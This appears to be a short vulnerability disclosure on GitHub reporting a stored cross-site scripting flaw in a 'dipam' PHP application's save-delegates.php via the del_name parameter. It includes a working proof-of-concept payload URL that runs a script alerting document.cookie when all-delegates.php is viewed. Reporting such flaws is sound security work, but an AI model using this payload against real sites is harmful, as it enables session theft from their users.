Skip to content

Latest commit

 

History

History
13 lines (7 loc) · 465 Bytes

XSS3.md

File metadata and controls

13 lines (7 loc) · 465 Bytes

BUG_Author: zhangyf

Vulnerability File: /dipam/save-delegates.php

GET parameter "del_name" exists stored cross-site scripting vulnerability

Payload: /dipam/save-delegates.php?del_name=<script>alert(document.cookie)</script>&del_color=%23000000

image

Payload will trigger when a user visits on http://localhost/dipam/all-delegates.php.

image